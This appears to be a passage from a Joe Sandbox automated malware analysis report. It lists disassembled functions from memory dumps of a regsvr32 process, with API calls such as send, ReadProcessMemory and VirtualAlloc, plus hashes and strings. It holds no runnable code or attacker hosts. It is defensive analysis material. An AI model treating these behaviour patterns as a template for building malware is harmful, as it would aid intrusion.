                                                                  • Opcode Fuzzy Hash: 52f955a77cda6ee3d85607626bb12db13f9d038e95c19b838b26b6b59c27f4c0
                                                                  • Instruction Fuzzy Hash: FBE01B75941649A7DB133BF18C0859F7A9EDD55340B504C18ED5293100DF74E8514FF9
                                                                  APIs
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F3192
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F31DB
                                                                  • CloseHandle.KERNEL32(?,00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F31EE
                                                                  • CloseHandle.KERNEL32(00000000,?,?,6C8F2F39,?), ref: 6C8F3209
                                                                  • CloseHandle.KERNEL32(?,00000000,?,?,6C8F2F39,?), ref: 6C8F320F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateErrorEventLast
                                                                  • String ID:
                                                                  • API String ID: 3743700123-0
                                                                  • Opcode ID: af77b15589d869b31cbb582a8d48f8dc5b8d17b895ef85dbcbb50f3167cdd8b0
                                                                  • Instruction ID: e4b2caec166d6cb1a6e2a5cc2cf9c0d4e178b801e811db168b11c98f1f9ba4c5
                                                                  • Opcode Fuzzy Hash: af77b15589d869b31cbb582a8d48f8dc5b8d17b895ef85dbcbb50f3167cdd8b0
                                                                  • Instruction Fuzzy Hash: F51129B06107067FE3109F358C41B95B7A4BF66308F108265F2189BB81EBB0D494C7A1
                                                                  APIs
                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02632D3C
                                                                  • CancelIo.KERNEL32(?), ref: 02632D46
                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02632D4F
                                                                  • closesocket.WS2_32(?), ref: 02632D59
                                                                  • SetEvent.KERNEL32(00000001), ref: 02632D63
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                  • String ID:
                                                                  • API String ID: 1486965892-0
                                                                  • Opcode ID: 4c51554fff4b9ee11b9d59c2c84d679e3cb0630f161f8827e022de358ba1b7a4
                                                                  • Instruction ID: 2e5fe343da5bc9a9392d917abab55d23dd44a53dc17f4c7a0fbf98d266e51537
                                                                  • Opcode Fuzzy Hash: 4c51554fff4b9ee11b9d59c2c84d679e3cb0630f161f8827e022de358ba1b7a4
                                                                  • Instruction Fuzzy Hash: 3EF03C7A540700ABD3209F54DC49F5A77F8BB49B11F505A59F68297680C7B0B9848BA0
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000004), ref: 6C8A7CBB
                                                                  • memset.MSVCRT ref: 6C8A7D82
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8A7E08
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6C8A7E15
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000004), ref: 6C8A7E62
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$memset
                                                                  • String ID:
                                                                  • API String ID: 3732838118-0
                                                                  • Opcode ID: c3fe77403436817711885dbb76b6373f3b3a6dcb25a9bc0770869c86a6a82962
                                                                  • Instruction ID: a07b8fe76749b121f734908dc7aec39dd43ddfca3e7deb292bbb191cf5f8c3d7
                                                                  • Opcode Fuzzy Hash: c3fe77403436817711885dbb76b6373f3b3a6dcb25a9bc0770869c86a6a82962
                                                                  • Instruction Fuzzy Hash: 8B615871904340ABE7108F648D41BDAB7F4BFA570CF044918FA489B741E775E91987E2
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02635E71
                                                                    • Part of subcall function 02635D70: _memset.LIBCMT ref: 02635D92
                                                                  • RegOpenKeyExW.KERNEL32(80000001,0264769C,00000000,00020019,?), ref: 0263601B
                                                                  • RegQueryValueExW.KERNEL32(?,026476AC,00000000,00000003,00000000,00000000), ref: 02636040
                                                                  • _memset.LIBCMT ref: 02636058
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 264051494-0
                                                                  • Opcode ID: 16efc1b962aa4c36183fb33e83015cc8f937e552439a994bc180ba3955c5dd8f
                                                                  • Instruction ID: 3c9ba49ddd92fe68c2ffd53a315e01e39c9fc11e82a7e38e263791b01c24efc9
                                                                  • Opcode Fuzzy Hash: 16efc1b962aa4c36183fb33e83015cc8f937e552439a994bc180ba3955c5dd8f
                                                                  • Instruction Fuzzy Hash: C35198B4BC174579F723BAA46C0BF5DBB564B15F04FA0004AB6833A2C15EE075844DAE
                                                                  APIs
                                                                    • Part of subcall function 02637734: __fassign.LIBCMT ref: 0263772A
                                                                  • Sleep.KERNEL32(00000000), ref: 0263615C
                                                                    • Part of subcall function 026370D7: _malloc.LIBCMT ref: 026370F1
                                                                  • Sleep.KERNEL32(00000000), ref: 026362C1
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0263630D
                                                                    • Part of subcall function 02632C60: WSAStartup.WS2_32(00000202,?), ref: 02632CBF
                                                                    • Part of subcall function 02632C60: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02632CCA
                                                                    • Part of subcall function 02632C60: InterlockedExchange.KERNEL32(00000018,00000000), ref: 02632CD8
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02636357
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateEventSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                                                  • String ID:
                                                                  • API String ID: 1042251235-0
                                                                  • Opcode ID: 2875d458f7d7aa69e61089d8da31bd556430c46a1214b58ad946d1e5f0efe4fd
                                                                  • Instruction ID: e3c68ce6747ecf2ff0e52f83d47690ff200e07974737b06f5d79209b19bfc5f2
                                                                  • Opcode Fuzzy Hash: 2875d458f7d7aa69e61089d8da31bd556430c46a1214b58ad946d1e5f0efe4fd
                                                                  • Instruction Fuzzy Hash: E551F5B4E82305AFEB01EFA4DCC1A6EB7B5BF49714F101A19E451A7380CF709950CB95
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 026370F1
                                                                    • Part of subcall function 02637043: __FF_MSGBANNER.LIBCMT ref: 0263705C
                                                                    • Part of subcall function 02637043: __NMSG_WRITE.LIBCMT ref: 02637063
                                                                    • Part of subcall function 02637043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02637088
                                                                  • std::exception::exception.LIBCMT ref: 02637126
                                                                  • std::exception::exception.LIBCMT ref: 02637140
                                                                  • __CxxThrowException@8.LIBCMT ref: 02637151
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID:
                                                                  • API String ID: 615853336-0
                                                                  • Opcode ID: 77970f782aadafbbaf7a9ed2403f98918c1b21df278712a9780f300333e0c0d1
                                                                  • Instruction ID: 3ada6116d381a6de4736ae02b7c95d612ea17b9470d1c885ebef523645cb2fba
                                                                  • Opcode Fuzzy Hash: 77970f782aadafbbaf7a9ed2403f98918c1b21df278712a9780f300333e0c0d1
                                                                  • Instruction Fuzzy Hash: 2EF028B594010DBBEB07EFA1DD10A9EBBEBAB40718F10101DE441E61C0DFB0CA84CB99
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 6C87AFED
                                                                  • K32GetPerformanceInfo.KERNEL32(?,00000038), ref: 6C87B056
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalInfoMemoryPerformanceStatus
                                                                  • String ID: @
                                                                  • API String ID: 3163563144-2766056989
                                                                  • Opcode ID: 7864199870d36e84eef8a7e023d50f8d7d6f4a0782004374e4ac4b9c66ba5048
                                                                  • Instruction ID: 5bcb30800b913d9573e863f3a765955f063e5884798e6ee8c159856574a7f264
                                                                  • Opcode Fuzzy Hash: 7864199870d36e84eef8a7e023d50f8d7d6f4a0782004374e4ac4b9c66ba5048
                                                                  • Instruction Fuzzy Hash: 0F3184709087C496E725CF3DC9457EAB7F9BFD8218F00CA19F99492551F731E2C48A91
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 04FA25AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: .$.dll
                                                                  • API String ID: 1029625771-979041800
                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction ID: ec48b12f64749fc6a2931e91a42d764f18a0edf7be85a22167afc88ea7edbb91
                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction Fuzzy Hash: A1210AB5B002858FE721CFACC854A69BBA4BF05320F0A40ECD80187741D730F856C740
                                                                  Strings
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C863ECA, 6C863F8A, 6C864139, 6C86423B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 0-3546870700
                                                                  • Opcode ID: baf40ef6b118ef34f56c91c3dd8fbcec6da7f93f92fc0308277f1fab9dfc8712
                                                                  • Instruction ID: e7d18b38140e32aede90c4e6441fc4c977318b95bb2e7911b7fa52127c5ebc39
                                                                  • Opcode Fuzzy Hash: baf40ef6b118ef34f56c91c3dd8fbcec6da7f93f92fc0308277f1fab9dfc8712
                                                                  • Instruction Fuzzy Hash: B7B1C471814B419BE320DF29C8417ABBBE4BFE6308F045B1CF9D02AA91FB75D1488792
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263314B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02633163
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263320F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 4033114805-0
                                                                  • Opcode ID: 83e4014cfa7ad7b2381d2fe0fa786f5c63aef032fb419dfe99e26fb14bbb92d8
                                                                  • Instruction ID: 4eafb0d3498d5bd8a0996e7ffa5c98c8d16ea59c5d4d4666d6864160d6ff520d
                                                                  • Opcode Fuzzy Hash: 83e4014cfa7ad7b2381d2fe0fa786f5c63aef032fb419dfe99e26fb14bbb92d8
                                                                  • Instruction Fuzzy Hash: 163198742006069FC729DF69C880A6AB3E5FF44718B10C5ADE84ACB715D731F8A2CBD0
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 026311E9
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02631226
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02631255
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: 93a7094dbbc9a2666815eeb616505fc74dffee754e06fd3a85709a876b281e44
                                                                  • Instruction ID: 95c151505857ce5e62feaff4fa8295d88cb73a011c66880dd8932ad3940f6ba0
                                                                  • Opcode Fuzzy Hash: 93a7094dbbc9a2666815eeb616505fc74dffee754e06fd3a85709a876b281e44
                                                                  • Instruction Fuzzy Hash: 9021D131E00309AFDB149FAAD881B6EFBF5FF40B05F0089ADE849E2640E770A8508B44
                                                                  APIs
                                                                  • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6C982648,?,00000004,000000FF,6C8D1D45,6C9CA090,00000000), ref: 6C8FD4DF
                                                                  • GetLastError.KERNEL32 ref: 6C8FD4E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLastWait
                                                                  • String ID:
                                                                  • API String ID: 1574541344-0
                                                                  • Opcode ID: e6a8cc46f310a3fcfde8221308d6e56336ffe8ed6d031ceb87d65fbf785b3056
                                                                  • Instruction ID: 0b274546d4dcf3ed044480558e060b1049cbde878795309d16fefe49aded1941
                                                                  • Opcode Fuzzy Hash: e6a8cc46f310a3fcfde8221308d6e56336ffe8ed6d031ceb87d65fbf785b3056
                                                                  • Instruction Fuzzy Hash: 5711D631B051064BDF15DE58C990AAE73B1EBA936CB30452AD321A7740EB35AD03C7A0
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 0263112F
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0263115F
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02631192
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000258), ref: 026332FE
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02633306
                                                                  • Sleep.KERNEL32(0000012C), ref: 0263332B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 2054240878-0
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 02637341
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __endthreadex.LIBCMT ref: 02637351
                                                                    • Part of subcall function 02637316: __getptd_noexit.LIBCMT ref: 0263731B
                                                                    • Part of subcall function 02637316: __freeptd.LIBCMT ref: 02637325
                                                                    • Part of subcall function 02637316: RtlExitUserThread.NTDLL(?,?,02637356,00000000), ref: 0263732E
                                                                    • Part of subcall function 02637316: __XcptFilter.LIBCMT ref: 02637362
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                  • String ID:
                                                                  • API String ID: 4175385852-0
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(00000000,0000001A,00000000,00000000,00000000), ref: 6C876611
                                                                  Strings
                                                                  • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\process.rs, xrefs: 6C876668
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\process.rs
                                                                  • API String ID: 1726664587-1582062572
                                                                  APIs
                                                                  • memcmp.MSVCRT(?,?,5F28726F), ref: 6C85BB5C
                                                                  • PdhAddEnglishCounterW.PDH(?,8B3B74C0,00000000,00000000), ref: 6C85BBCD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CounterEnglishmemcmp
                                                                  • String ID:
                                                                  • API String ID: 2360070311-0
                                                                  APIs
                                                                  • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,6C876AD4), ref: 6C876450
                                                                  • LocalFree.KERNEL32(?,?,?), ref: 6C8764E9
                                                                    • Part of subcall function 6C8929C0: wcslen.MSVCRT ref: 6C8929CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ArgvCommandFreeLineLocalwcslen
                                                                  • String ID:
                                                                  • API String ID: 4161585929-0
                                                                  APIs
                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 02633271
                                                                  • send.WS2_32(?,?,?,00000000), ref: 026332AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: SleepTimetime
                                                                  • String ID:
                                                                  • API String ID: 346578373-0
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,026361A0,00000000,02635B02), ref: 026365EB
                                                                  • _free.LIBCMT ref: 02636626
                                                                    • Part of subcall function 02631280: __CxxThrowException@8.LIBCMT ref: 02631290
                                                                    • Part of subcall function 02631280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026312A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                  • String ID:
                                                                  • API String ID: 1116298128-0
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 6C8F82BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
